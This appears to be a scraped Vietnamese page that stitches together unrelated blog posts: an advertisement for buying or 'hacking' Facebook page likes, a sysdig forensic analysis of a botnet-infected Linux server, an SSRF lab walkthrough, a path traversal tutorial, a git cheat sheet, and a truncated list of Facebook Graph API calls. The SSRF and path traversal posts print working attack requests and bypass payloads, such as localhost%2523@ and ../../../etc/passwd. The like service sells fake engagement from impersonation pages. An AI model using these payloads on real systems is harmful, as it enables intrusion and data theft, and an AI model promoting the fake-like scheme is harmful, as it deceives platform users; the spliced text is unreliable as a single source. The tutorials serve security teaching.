tang-2Blike-2Bfanpage-2Bfacebook.png

Báo giá dịch vụ tăng like trang fanpage facebook của TD-SOFT

Tầm quan trọng của Fanpage Facebook – Doanh nghiệp của bạn đã có Fanpage Facebook? 
Nếu chưa, bạn cần phải nhanh chóng tạo ngay cho mình 1 trang Fanpage Facebook. Đó là 1 mạng xã hội tốt nhất tại thời điểm này, việc duy trì 1 trang FanPage giúp cho công việc kinh doanh và thương hiệu được nhiều khách hàng biết đến. Bạn có thể SEO cho trang Fanpage và bạn kết nối với khách hàng.

Tại sao bạn phải có trang FanPage Facebook?
Đó là tựa đề của bài viết có 1 vài thông tin tuyệt vời, đáng chú ý nhất và hệ thống mạng xã hội tiếp thị tốt nhất theo số liệu từ Cone. Từ số liệu của Cone, có đến 77% người dùng các mạng xã hội trực tuyến muốn nhận được các ưu đãi từ các thương hiệu và 28% trong số là họ muốn giải trí.
Đó là con số không ai có thể bỏ qua, bạn có thể up video, tạo phiếu khảo sát, hay những kế hoạch thu hút khách hàng. Thật là dễ dàng, vui và lập kế hoạch tốt cho kinh doanh. Điều tốt nhất là: Facebook tạo ra những nội dung chia sẻ trên trang bằng công cụ tìm kiếm. Vâng, đúng vậy. Tuyệt vời phải không?

Dưới đây là 10 lợi ích mà một Fanpage trên Facebook mang lại cho việc kinh doanh của bạn:
1. Tạo một khu vực kinh doanh khác ngoài website
2. Hướng lượng truy cập đến website của bạn
3. Cải thiện SEO
4. Cho phép bạn tham gia với cộng đồng một cách dễ dàng và hoàn toàn miễn phí
5. Kết nối khách hàng và người hâm mộ với doanh nghiệp của bạn
6. Tăng cường quan hệ khách hàng
7. Cung cấp một nền tảng đầy tiềm năng cho việc quảng bá thương hiệu
8. Lắng nghe và quan sát để cải thiện việc kinh doanh
9. ROI & các số liệu liên quan đều sẵn có
10. Bắt kịp với sự cạnh tranh hoàn toàn miễn phí

Đáp ứng nhu cầu cần tăng like fanpage của đa số khách hàng chúng tôi luôn muốn mang tới dịch vụ uy tín và chất lượng nhất

Hiện tại TD-SOFT cung cấp 3 hình thức để tăng like fanpage với nhiều mức giá khác nhau cho khách hàng lựa chọn:

1. Hack like 100₫/like
Ưu điểm:
– Like người việt nam, ngẫu nhiên giới tính và khu vực
– Giá rẻ
– Phù hợp với các page mới tạo, kinh doanh nhỏ muốn tiết kiệm chi phí. Tạo uy tin ban đầu cho khách hàng khi vào trang fanpage

Nhược điểm:
Hiện tại fb đang chặn làm cho page cũ nên chỉ làm được cho cho khách hàng chưa có page. Khách hàng gửi tên page cần làm cho bên mình rồi chuyển khoản trước. Sau 1 đến 2 ngày page đủ like sẽ giao fanpage cho khách hàng
– Vì hack nên sẽ có rủi ro 10% bị fb phát hiện và khoá page. Trong trường hợp khoá page, Bên mình sẽ bảo hành lại số like của page 1 lần. Nếu vẫn bị khoá tiếp thì không bảo hành
– Tăng tối thiểu 3000 like.

Quy trình tăng like:
– Khách hàng liên hệ với TD-SOFT và gửi tên fanpage và số like cần tăng để chúng tôi khảo sát
– Nếu tên fanpage có thể sử dụng, quý khách hàng chuyển khoản trước 50% để đặt cọc hoặc 100% nếu muốn
– Sau khi chúng tôi hack like cho fanpage mới theo tên của khách hàng yêu cầu xong sẽ thêm khách hàng làm quản trị viên fanpage
– Khách hàng chuyển khoản nốt giá trị còn lại của hợp đồng
– Sau khi đã hoàn tất, TD-SOFT thoát hết quyền quản trị fanpage và khách hàng sở hữu fanpage
Bảo hành: 1 tháng nếu khách hàng không vi phạm các chính sách của facebook

2. Mua page có sẳn like tự nhiên (200đ/like)
Ưu điểm:
– Là các fanpage được tăng like bằng cách fake người nổi tiếng hoặc page cộng đồng, page hài,…
– Like tự nguyện 100%, chỉ cần đổi tên sau khi mua
– Like thật, người việt nam, ngẫu nhiên giới tính và khu vực
– Chạy quảng cáo tốt, hiếm khi bị facebook chặn vì đây là like thật
– Giá tương đối rẻ
– Nếu bị facebook chặn hoặc khóa có thể kháng nghị và yêu cầu facebook hỗ trợ vì page like thật và không vi phạm vấn đề gì của facebook.
Nhược điểm:
– Do cộng đồng like ngẫu nhiên nên không chọn được đối tượng chính xác
– Số lượng like tùy theo page có sẳn

Quy trình tăng like:
– Khách hàng liên hệ với TD-SOFT và gửi tên fanpage và số like và các yêu cầu như tỷ lệ nam nữ,… mong muốn để chúng tôi khảo sát
– Khách hàng chuyển khoản trước 10% để đặt cọc
– TD-SOFT sẽ tìm kiếm các fanpage cộng đồng có like tự nhiên thỏa mãn yêu cầu khách hàng
– Khách hàng chọn lựa fanpage theo ý mình
– Khách hàng chuyển khoản thêm 40% giá trị hợp đồng để đảm bảo chắc chắn lấy fanpage đó
– TD-SOFT đổi tên fanpage thành tên theo khách yêu cầu và set khách hàng làm biên tập viên
– Khách hàng chuyển khoản nốt số tiền còn lại của hợp đồng
– TD-SOFT set quyền quản trị viên fanpage cho khách hàng
– TD-SOFT thoát tất cả quyền quản trị ở trên page và khách hàng chính thức sở hữu fanpage

Bảo hành: 1 đổi 1 trong vòng 1 tháng (hoặc 6 tháng – 300đ/like) nếu khách hàng không vi phạm các chính sách của facebook

3. Like chạy quảng cáo fb (ads facebook) 1.000₫-2.000₫/like
– Là like tự nguyện khi bên mình set chạy quảng cáo trên facebook ( những bài có ghi được tài trợ hoặc được đề xuất trên newfeed của bạn)
– Được tuỳ chọn giới tính. Khu vực. Độ tuổi của người like
– Giá cao vì phải trả tiền cho facebook. Còn giá chính xác thì tuỳ mỗi page kinh doanh mặt hàng gì gửi bên mình khảo sát mới biết được
– An toàn 100% vì đây là dịch vụ của facebook
– Độ tương tác cao vì like tự nguyện
– Rất phù hợp cho các page làm thương hiệu
– Bảo hành tụt like vĩnh viễn

Quy trình tăng like:
– Khách hàng liên hệ với TD-SOFT
– Khách hàng gửi link fanpage, đối tượng quảng cáo cần chạy (giới tính, địa điểm, độ tuổi,…) và các yêu cầu liên quan
– TD-SOFT khảo sát và báo giá
– Khách hàng cấp quyền Nhà Quảng Cáo cho TD-SOFT tiến hành chạy quảng cáo
– Khách hàng nếu đồng ý chuyển khoản theo số tiền muốn chạy (Có thể chia ra nhiều đợt chuyển)
– TD-SOFT chạy theo số tiền khách hàng chuyển khoản và yêu cầu đặt ra
– Khách hàng xem xét hiệu quả

Đặc biệt mua like page tặng lượt theo dõi page. Ví dụ mua 3000 like được tặng 3000 theo dõi

Để đăng ký tăng like facebook vui lòng liên hệ với chúng tôi để được tư vấn và hỗ trợ tốt nhất


1.png

Phân tích tấn công tới máy chủ Linux

Lời mở đầu
Có bao giờ bạn đặt câu hỏi rằng những giải pháp bảo mật liệu đã làm có chính xác hay chưa ? Điều gì thực sự xảy ra khi bạn là nạn nhân của những vụ tấn công đơn ? Kẻ tấn công đã làm những gì ? Hi vọng bài viết phần nào sẽ trả lời được những câu hỏi đó bằng cách phân tích những cuộc tấn công vào server của bạn. Công cụ được tôi sử dụng đó là Sysdig.
Cài đặt
Để cài đặt tự động sysdig chỉ cần chạy lệnh sau đây với root hoặc sudo.
Tìm hiểu cuộc tấn công máy chủ
Cấu hình sysdig khởi động với enable compression (-z) và tuỳ chọn capture 4906 bytes cho mỗi I/O buffer.
sysdig -s 4096 -z -w /mnt/sysdig/$(hostname).scap.gz
Có 3 thứ cần phải lưu tâm hàng đầu :
  • Có cái nhìn tổng thể về các process
  • Network
  • I/O
Đầu tiền, chúng ta nhìn vào nhưng top process bằng network I/O trên máy chủ bị tấn công :
1.png
Có vẻ quá nhiều lưu lượng cho 1 máy chủ và quan trọng nó vẫn chưa đi vào hoạt động. Vậy tại sao lại vậy ? Tiếp theo chúng ta sẽ làm rõ hơn bằng cách nhìn vào các kết nối mạng :
2.png
Vậy có hơn 800MB UDP traffic. Điều này cho thấy máy chủ này đã bị DoS. Có thể kẻ tấn công đã cài đặt botnet, chúng ta sẽ cùng làm rõ điều này hơn.
3.png
Điều gì đây? Những kẻ tấn công đã tạo ra một thư mục ẩn trong /usr/bin với cái tên khá “thông minh” .shm, tải tập tin được archive tại URL ở trên. Dưới đây là những gì kẻ tấn công đã làm tiếp theo :
4.png
Chúng ta thấy kẻ tấn công đã tải 1 file pdf ẩn, có vẻ như nó là 1 perl script. Sau khi thực thi script đó kẻ tấn công đã xoá khỏi server. Muốn hiểu được rõ hơn chúng ta cần biết trong script đó có gì. Nhưng đương nhiên chúng cũng đủ thông minh khi cũng xoá hỏi từ URL trên. Thật may với công cụ Sysdig, nó ghi lại mọi quá trình hoạt động đó.
5.png
Đó là perl DoS client được điều khiển từ IRC, vị vậy những kẻ tấn công có thể dễ dàng quản lý hàng trăm hàng nghìn server bị tấn công. Chúng ta có thể đoán được botnet này có nhiệm vụ nhận UDP IRC message, sau đó sẽ flood toàn bộ network traffic. Hãy thử xem nếu một ai đó gửi đi 1 lệnh :
6.png
Như bạn thấy, bot đã nhận được kết nối TCP có chứa lệnh tấn công IP 39.115.244.150 trên cổng 800, đó cũng là IP chúng ta đã thấy ở đầu trong dach sách kết nối với hơn 800MB traffic. Nhưng có vẻ cuộc tấn công chưa dừng lại ở đây ☹
7.png
magixlabs là gì ? Mr.Google trả lời đó là 1 loại rootkit, nhưng điều chúng ta muốn là phân tích nó, vì vậy chúng ta lại sử dụng sysdig một lần nữa.
8.png
Ah, một loạt cái file nhị phân, chúng muốn thay thế những file nhị phân của hệ thống.
9.png
Có vẻ chúng rất tốt bụng đấy chứ, còn làm một bản copy để backup lại để cho chúng ta nếu có nhu cầu ☺. Nhưng gì chúng ta tìm được đó là 2 botnet IRC, các file nhị phân. Nhưng vẫn có điều còn chưa rõ đó là traffic UDP được tạo ra bởi tiến trình/usr/bin/httpd và /usr/local/apac.
$ sysdig -r trace.scap.gz -A evt.args contains /usr/local/apac ...
955716 06:13:20.225363385 0 perl (10200) < clone res=10202(perl) exe=/usr/local/apach args= tid=10200(perl) pid=10200(perl) ptid=7748(-bash) cwd=/tmp fdlimit=1024 flags=0 uid=0 gid=0 exepath=/usr/bin/perl ...
$ sysdig -r trace.scap.gz proc.pid = 10200
954458 06:13:20.111764417 0 perl (10200) < execve res=0 exe=perl args=.sloboz.pdf. tid=10200(perl) pid=10200(perl) ptid=7748(-bash) cwd=/run/shm fdlimit=1024 exepath=/usr/bin/perl
Kết luận
Chỉ cần sử dụng một công cụ đơn giản Sysdig, chúng ta có thể theo dõi khá chính xác được những hoạt động của hệ thống. Trong bài viết IP và URL được người viết bài lấy từ một số tài liệu trên internet nhằm để các bạn có thể hiểu rõ hơn. Mặt khác, những gì trong bài viết chỉ bó hẹp trong cách suy nghĩ của người viết bài, còn rất nhiều điều khác đang chờ chính các bạn tự khám phá.
0b192762-6c39-4255-ad05-0e58ea99deb0.png

Server-side request forgery (SSRF)

SSRF là gì?

Server-side request forgery (SSRF) là một lỗ hổng web cho phép attacker thực hiện ở phía server các requests đến domain tùy ý của kẻ tấn công.
Trong SSRF, các attacker có thể khiến máy chủ kết nối đến chính dịch vụ của nó hoặc các dịch vụ của bên thứ ba nào đó.

Hậu quả

Một cuộc tấn công SSRF thành công có thể dẫn đến cách hành động truy cập dữ liệu trái phép trong một tổ chức, trong chính ứng dụng đó hoặc trong các hệ thống back-end khác mà ứng dụng đó có thể giao tiếp. Trong một số trường hợp SSRF có thể dẫn đến attacker có thể thực hiện command execution.

Một số cách thức tấn công

1. Tấn công máy chủ cục bộ

Giả sử có một trang web bán hàng mà kẻ tấn công muốn truy cập đến trang admin:
Attacker truy cập trực tiếp trang admin từ phía client
GET /admin HTTP/1.1
Host: xyz.web-security-academy.net
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:72.0) Gecko/20100101 Firefox/72.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Cookie: session=xyz
Upgrade-Insecure-Requests: 1
Sau khi truy cập trang admin từ phía client thì attacker nhận được mã 401 Unauthorized và message thông báo Admin interface only available if logged in as an administrator, or if requested from loopback nghĩa là chúng ta không thể truy cập trực tiếp được trang quản trị admin với một vai trò người dùng thường.
HTTP/1.1 401 Unauthorized
Content-Type: text/html; charset=utf-8
Connection: close
Content-Length: 1940
...
...
...

<div class="container is-page">
Admin interface only available if logged in as an administrator, or if requested from loopback
</div>
Tại trang web bán hàng này có chức năng xem các sản phẩm có tại các cửa hàng đó hay không. Để cung cấp thông tin cho khách hàng thì ứng dụng đã truy vấn đến các REST APIs khác nhau. Chức năng này được thực hiện bằng các chuyển URL đến endpoint back-end API thông qua front-end HTTP request.
POST /product/stock HTTP/1.1
Host: xyz.web-security-academy.net
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:72.0) Gecko/20100101 Firefox/72.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://xyz.web-security-academy.net/product?productId=1
Content-Type: application/x-www-form-urlencoded
Origin: https://xyz.web-security-academy.net
Content-Length: 97
Connection: close
Cookie: session=xyz

stockApi=http%3a//stock.weliketoshop.net%3a8080/product/stock/check%3fproductId%3d1%26storeId%3d1
Dựa vào các thức mà ứng dụng gửi yêu cầu attacker đã thay đổi yêu cầu truy cập đến trang quản trị admin
stockApi=http%3a//stock.weliketoshop.net%3a8080/product/stock/check%3fproductId%3d1%26storeId%3d1
POST /product/stock HTTP/1.1
Host: xyz.web-security-academy.net
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:72.0) Gecko/20100101 Firefox/72.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://xyz.web-security-academy.net/product?productId=1
Content-Type: application/x-www-form-urlencoded
Origin: https://xyz.web-security-academy.net
Content-Length: 31
Connection: close
Cookie: session=xyz

stockApi=http://localhost/admin
Như vậy là attacker đã truy cập thành công trang admin.
HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Set-Cookie: session=xyz; Secure; HttpOnly
Connection: close
Content-Length: 2562
...
...
...

<section class="maincontainer">
<div class="container is-page">
<section>
<h1>Users</h1>
<div>
<span>administrator - </span>
<a href="/admin/delete?username=administrator">Delete</a>
</div>
<div>
<span>carlos - </span>
<a href="/admin/delete?username=carlos">Delete</a>
</div>
<div>
<span>wiener - </span>
<a href="/admin/delete?username=wiener">Delete</a>
</div>
</section>
<br>
<hr>
</div>
</section>
Vì sao xảy ra những vấn đề như vậy:
  • Việc kiểm tra kiểm soát truy cập được thực hiện ở phía front-end mà không phải phía server.
  • Ứng dụng cho phép truy cập trang quản trị mà không cần đăng nhập, có thể truy cập đối với bất kỳ người dùng nào từ phía local.

2. Tấn công SSRF với while list input filters

Thường một số ứng dụng chỉ cho phép một số đầu vào mà của người dùng như bắt đầu bằng, matches,… với while list mà họ đã định ra. Đôi khi chúng ta có thể khai thác sự không đồng nhất trong việc phân tích URL.
Đây là cấu trúc một URL dựa vào đó mà ta có thể khai thác cách phần tích URL của một máy chủ
scheme://user:pass@host:port/path?query=value#fragment
  • Thêm thông tin đăng nhập vào URL trước hostname
  • Sử dụng # để chỉ ra nội dung của mục con.
  • URL-encode
  • Có thể sử dụng kết hợp tất cả các trên tùy vào mỗi ứng dụng mà họ filters khác nhau.
Vẫn giống ví dụ trước cũng là một trang bán hàng có chức năng xem các sản phẩm có ở đó hay không, nhưng lần này ứng dụng đã kiểm tra kỹ hơn đầu vào mà người dùng nhập vào.
Trong trường hợp này attacker cũng đổi host nhưng đã bị chặn lại bởi ứng dụng web chỉ chấp thuận host stock.weliketoshop.net

POST /product/stock HTTP/1.1
Host: xyz.web-security-academy.net
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:72.0) Gecko/20100101 Firefox/72.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://xyz.web-security-academy.net/product?productId=1
Content-Type: application/x-www-form-urlencoded
Origin: https://xyz.web-security-academy.net
Content-Length: 25
Connection: close
Cookie: session=xyz

stockApi=http://127.0.0.1

HTTP/1.1 400 Bad Request
Content-Type: application/json
Connection: close
Content-Length: 58

"External stock check host must be stock.weliketoshop.net
Khi không thay đổi được host attacker thử thêm username vào URL thì nhận được response Internal Server Error điều này khiến cho attacker nghi ngờ rằng chúng đang cố gắng kết nối đến server là “username”.
POST /product/stock HTTP/1.1
Host: xyz.web-security-academy.net
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:72.0) Gecko/20100101 Firefox/72.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://xyz.web-security-academy.net/product?productId=1
Content-Type: application/x-www-form-urlencoded
Origin: https://xyz.web-security-academy.net
Content-Length: 47
Connection: close
Cookie: session=xyz

stockApi=http://username@stock.weliketoshop.net
HTTP/1.1 500 Internal Server Error
Content-Type: application/json
Connection: close
Content-Length: 51

"Could not connect to external stock check service"
Khi đó attacker thử kết nối đến server localhost với #fragment là @stock.weliketoshop.net và kết quả là vẫn không thu được gì.
POST /product/stock HTTP/1.1
Host: xyz.web-security-academy.net
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:72.0) Gecko/20100101 Firefox/72.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://xyz.web-security-academy.net/product?productId=1
Content-Type: application/x-www-form-urlencoded
Origin: https://xyz.web-security-academy.net
Content-Length: 49
Connection: close
Cookie: session=xyz

stockApi=http://localhost#@stock.weliketoshop.net
HTTP/1.1 400 Bad Request
Content-Type: application/json
Connection: close
Content-Length: 58

"External stock check host must be stock.weliketoshop.net"
Cho đến khi attacker Double-URL encode và nhận được response 200 OK thì một trong những kết quả tồi tệ nhất của một trang web khi bị attack cũng đã xuất hiện ^_^
POST /product/stock HTTP/1.1
Host: xyz.web-security-academy.net
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:72.0) Gecko/20100101 Firefox/72.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://xyz.web-security-academy.net/product?productId=1
Content-Type: application/x-www-form-urlencoded
Origin: https://xyz.web-security-academy.net
Content-Length: 53
Connection: close
Cookie: session=xyz

stockApi=http://localhost%2523@stock.weliketoshop.net
HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Set-Cookie: session=xyz; Secure; HttpOnly
Connection: close
Content-Length: 10767
...
...

<section class="top-links">
<a href="/login">Account login</a> |
<a href="/admin">Admin panel</a> |
</section>
Đến đây attacker có thể vào trang admin như một người quản trị bình thường
POST /product/stock HTTP/1.1
Host: xyz.web-security-academy.net
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:72.0) Gecko/20100101 Firefox/72.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://xyz.web-security-academy.net/product?productId=1
Content-Type: application/x-www-form-urlencoded
Origin: https://xyz.web-security-academy.net
Content-Length: 59
Connection: close
Cookie: session=xyz

stockApi=http://localhost%2523@stock.weliketoshop.net/admin
HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Set-Cookie: session=xyz; Secure; HttpOnly
Connection: close
Content-Length: 2566
...
...
...

<section>
<h1>Users</h1>
<div>
<span>administrator - </span>
<a href="/admin/delete?username=administrator">Delete</a>
</div>
<div>
<span>carlos - </span>
<a href="/admin/delete?username=carlos">Delete</a>
</div>
<div>
<span>wiener - </span>
<a href="/admin/delete?username=wiener">Delete</a>
</div>
</section>
Những nguyên nhân xảy ra:
  • Do việc xử lí URL không được đồng nhất.
  • Không kiểm soát hết được input mà người dùng hay attacker truyền vào.
Ngoài ra còn một số kiểu tấn công khác tùy thuộc vào mỗi ứng dụng web đó xử lý và cách lập trình viên xử lý input mà người dùng nhập vào.

Cách ngăn chặn

Để ngăn ngừa các lỗ hổng SSRF trong ứng dụng web bạn nên sử dụng các while list các domains và protocols được phép truy cập tài nguyên từ phía máy chủ.
Nên tránh sử dụng các chức năng mà người dùng trực tiếp yêu cầu tài nguyên thay cho máy chủ. Ngoài ra bạn cũng nên filter user input(lọc đầu vào từ người dùng), trong trường hợp này nó rất khó để thực hiện bởi vì bạn không thể nắm hết được những input mà người dùng nhập vào.

Tham khảo

cdcf824e-4c32-4ac5-b2a3-2b3eb2c672b5.png

Tấn công Path traversal và cách thức phòng thủ

Giới thiệu

Hiện nay có 2 cơ chế bảo mật chính trong các web server hiện tại.
Access Control Lists (ACLs): Trên máy chủ thì người dùng chỉ được phép truy cập vào các thư mục, file mà quản trị viên đã chỉ định từ trước gọi là Access Control Lists.
Root Directory: Là thư mục chứa tất cả các thư mục khác hoặc cũng có thể chứa các files.
Path traversal thực hiện quyền truy cập vào các thư mục nhạy cảm hoặc bị hạn chế truy cập.

Path traversal là gì?

  • Path traversal( hay còn gọi là Directory traversal) là một lỗ hổng web cho phép kẻ tấn công đọc các file không mong muốn trên server. Nó dẫn đến việc bị lộ thông tin nhạy cảm của ứng dụng như thông tin đăng nhập , một số file hoặc thư mục của hệ điều hành. Trong một số trường hợp cũng có thể ghi vào các files trên server, cho phép kẻ tấn công có thể thay đổi dữ liệu hay thậm chí là chiếm quyền điều khiển server.

Ví dụ về cách tấn công.

  • Một ứng dụng load ảnh như sau:
<img src="/?filename=test_image.png">
  • Khi chúng ta gửi một request với một param filename=test_image.png thì sẽ trả về nội dung của file được chỉ định với tệp hình ảnh ở /var/www/images/test_image.png.
  • Ứng dụng không thực hiện việc phòng thủ cuộc tấn công path traversal, kẻ tấn công có thể thực hiện một yêu cầu tùy ý để có thể đọc các file trong hệ thống.
    • ví dụ:
      https://hostname.abc/?filename=../../../etc/passwd
      • Khi đó ứng dụng sẽ đọc file với đường dẫn là /var/www/images/../../../etc/passwd với mỗi ../ là trở về thư mục cha của thư mục hiện tại. Như vậy với ../../../ thì từ thư mục /var/www/images/ đã trở về thư mục gốc và file /etc/passwd chính là file được đọc.
      • Trên các hệ điều hành dựa trên Unix thì /etc/passwd/ là một file chứa thông tin về các người dùng.
      • Trên Windows thì có thể dùng cả hai ../ và .. để thực hiện việc tấn công này.
      • Đây là một trang web và chúng ta có thể xem các sản phẩm của họ dưới dạng hình ảnh. ảnh
      • Thử gửi một request đọc file /etc/passwd xem sao:
      • Và kết quả là chúng ta đã đọc được file /etc/passwd:
  • Thế nhưng chả có lý do gì mà các dụng không thực hiện việc phòng thủ các cuộc tấn công path traversal khi mà lỗ hổng này rất nghiệm trọng. Vậy làm sao để bypass?
  • Sau đây là một số cách bypass:
    • Ta thử với ../../../etc/passwd thì bị chặn, ta có thể thử bằng cách dùng đường dẫn tuyệt đối như /etc/passwd
       
    • Như vậy là param đã nhận đường dẫn tuyệt đối và chúng ta có thể đọc được file /etc/passwd
    • Hay một cách khác bạn có thể bypass bằng cách sử dụng ../ lồng nhau giống như trong trường hợp này: 
    • Một cách khác nữa chúng ta có thể encode hoặc null byte để vượt qua filter input
    • Ngoài ra các bạn có thể sử dụng
      • utf-8 unicode encoding
        • . = %u002e
        • / = %c0%af, %e0%80%af, %c0%2f
        • = %c0%5c, %c0%80%5c
      • 16-bit unicode encoding
        • . = %u002e
        • / = %u2215
        • = %u2216

Một số cách ngăn chặn.

  • Nên validate input của người dùng trước khi xử lý nó.
  • Sử dụng whitelist cho những giá trị được cho phép.
  • Hoặc tên file là những kí tự số,chữ không nên chứa những ký tự đặc biệt.

Tham khảo

Tập hợp những câu lệnh GIT hữu dụng

Dưới đây là một vài ví dụ về các câu lệnh Git mà tôi thường dùng.

Git config

git config --global user.name "John Doe"
git config --global user.email "john@example.com"
--global được sử dụng để áp dụng cho tất cả các projects. Nếu bạn ko sử dụng --global thì settings sẽ chỉ dùng cho riêng project đó.

Giúp Git bỏ qua file modes

cd project/
git config core.filemode false
Câu lệnh trên hữu dụng khi chúng ta không cần quan tâm đến quyền truy cập files (ví dụ như khi sử dụng Windows).

Liệt kê những settings đang sử dụng

git config --list

Khởi tạo Git repo cho code có sẵn

cd existing-project/
git init

Clone một remote repo

git clone https://github.com/user/repository.git
Câu lệnh trên sẽ tạo một thư mục mới có tên giống trên của repo.

Clone một remote repo tại thư mục hiện tại

git clone https://github.com/user/repository.git .

Xem thông tin trợ giúp cho một câu lệnh git

git help clone

Update và merge branch hiện tại với một remote repo

cd repo/
git pull origin master
với origin là remote repo, master là remote branch.
Nếu bạn không muốn merge những thay đổi của bạn, hãy sử dụng git fetch

Liệt kê các remote urls

git remote -v

Thay đổi origin url

git remote set-url origin https://github.com/repo.git

Thêm remote repo

git remote add remote-name https://github.com/user/repo.git

Xem thay đổi (chưa đc add) của những file hiện tại

git diff

Xem thay đổi (đã được add, chưa commit)

git diff --cached

Xem thay đổi giữa local mà master

git diff origin/master

Xem thay đổi giữa hai commits

git diff COMMIT1_ID COMMIT2_ID

Xem những files thay đổi giữa hai commits

git diff --name-only COMMIT1_ID COMMIT2_ID

Xem những files thay đổi tại một commit bất kỳ

git diff-tree -no-commit-id --name-only -r COMMIT_ID
hoặc
git show --pretty="format:" --name-only COMMIT_ID

Xem thay đổi trước khi push

git diff --cached origin/master

Xem thông tin cụ thể của một commit

git show COMMIT_ID

Kiểm tra status của working tree

git status

Tạo vài thay đổi, rồi commit

git add changed_file.txt
git add folder-with-changed-files/
git commit -m "Commiting changes"

Đổi tên/Di chuyển/Xoá files

git rm removeme.txt tmp/crap.txt
git mv file oldname.txt file_newname.txt
git commit -m "deleteing 2 files, renaming 1"

Đổi message của commit cuối

git commit --amend -m "New commit mesage"

Push local commits sang nhánh remote

git push origin master

Xem commit history

git log

Xem commit history cho hai commits gần nhất

git log -2

Xem commit history cho hai commits gần nhất, bao gồm cả thay đổi

git log -p -2

Xem commit history dưới dạng một dòng

git log --pretty=oneline

Revert một commit rồi push

git revert COMMIT_ID
git push origin master

Revert đến thời điểm trước một commit

git reset COMMIT_ID
git reset --soft HEAD@{1}
git commit -m "Revert to COMMIT_ID"
git reset --hard

Undo commit gần nhất, vẫn giữ thay đổi ở local

git reset --soft HEAD~1

Undo commit gần nhất, không giữ thay đổi ở local

git reset --hard HEAD~1

Undo commit gần nhất, vẫn giữ thay đổi ở index

git reset --mixed HEAD~1
hoặc
git reset HEAD~1

Undo commits chưa push

git reset origin/master

Reset về trạng thái của remote

git fetch origin
git reset --hard origin/master

Xem các nhánh local

git branch

Xem tất cả các nhánh

git branch -a

Tạo một patch

git diff > patch-issue-1.patch

Thêm một file rồi tạo patch

git add newfile
git diff --staged > patch-issue-2.patch

Thêm một file, thay đổi rồi tạo patch

git add newfile
git diff HEAD > patch-issue-2.patch

Tạo patch từ một commit

git format-patch COMMIT_ID

Tạo patch từ hai commit cuối

git format-patch HEAD~2

Tạo patch từ tất cả những commits chưa push

git format-patch origin/master

Tạo patch chứa dữ liệu nhị phân

git format-patch --binary --full-index origin/master

Apply một patch

git apply -v patch-name.patch

Apply một patch được tạo bằng format-patch

git am patch1.patch

Tạo một tag

git tag 7.x-1.3

Push một tag

git push origin 7.x-1.3

Tạo một nhánh

git checkout master
git branch new-branch-name
Lưu ý với hai câu lệnh trên thì chúng ta chưa chuyển sang nhánh mới, mà vẫn ở nhánh master. Phải sử dụng thêm git checkout new-branch-name để chuyển nhánh.
Ngoài ra có thể tạo nhánh mới và chuyển sang luôn bằng 1 câu git checkout -b new-branch-name

Chuyển nhánh

git checkout new-branch-name

Xem commit history so với branch hiện tại

git cherry -v master
master ở đây là branch mà bạn muốn so sánh

Merge commit từ branch khác

git checkout master
git merge branch-name
Ở đây chúng ta merge các commits của branch-name vào master.

Merge branch mà không commit

git merge branch-name --no-commit --no-ff

Xem thay đổi giữa state hiện tại và một branch

git diff branch-name

Xem thay đổi trong một file, giữa state hiện tại và một branch

git diff branch-name path/to/file

Xoá branch

git branch -d branch-name

Push lên một branch

git push origin branch-name

Lấy tất cả các branches

git fetch orgin

Lấy thư mục root

git rev-parse --show-toplevel

Xoá các file bị xoá ở local trên repo

git rm $(git ls-files --deleted)

Xoá toàn bộ các files chưa đc track

git clean -f
xoá cả folder:
git clean -f -d
xem các file trước khi xoá:
git clean -n -f -d

Unstage các files

git reset HEAD file.txt

Xem tag gần nhất

git describe --tags `git rev-list --tag --max-count=1`

Liệt kê các nhánh theo trình tự sử dụng gần nhất

git for-each-ref --sort=-committerdate refs/heads/ | head

Tar cả project, ngoại trừ thư mục .git

cd ..
tar cJf project.tar.xz project/ --exclude-vcs

Tar tất cả các files bị thay đổi ở local

git diff --name-only | xargs tar -cf project.tar -T -

Tìm conflict

grep -H -r "<<<" *
grep -H -r ">>>" *
grep -H -r '^=======$' *

Apply một patch không sử dụng git

patch < file.patch

integrate-facebook-graph-api-in-your-project-255B1-255D.jpg

Share Một Vài Graph Api Facebook Hữu Dụng

Graph API là một kiểu đồ thị cho phép bạn lấy được mọi thông tin trên Facebook. Nó bao gồm:
  •  node (nút): Những thứ xuất hiện trên facebook có tương tác như ảnh, post…
  •  edge (cạnh): những kết nối, liên hệ giữa nó.
  •  field (trường/lĩnh vực): thông tin của nó.
Chỉ cần bạn có Token thì có thể lấy được mọi thông tin và điều khiển fb qua token
Hiện tại thì Graph Api  Facebook khá là nhiều , bạn không biết Graph Api  bạn cần sử dụng là gì ? Vậy thì hãy đến bài viết này , mình sẽ chia sẻ một số Graph Api  hãy sử dụng và hữu dụng nhất hiện nay
Mỗi Graph Api  mình đều chú thích tính năng riêng của nó :
1. Đếm số tin nhắn đã gửi :
https://graph.facebook.com/me/threads?limit=50&access_token=
2. Xóa all tin nhắn : 
https://graph.facebook.com/id_tu_api_dem_tin_nhan?access_token=&method=delete
3. Lấy danh sách tất cả bạn bè : 
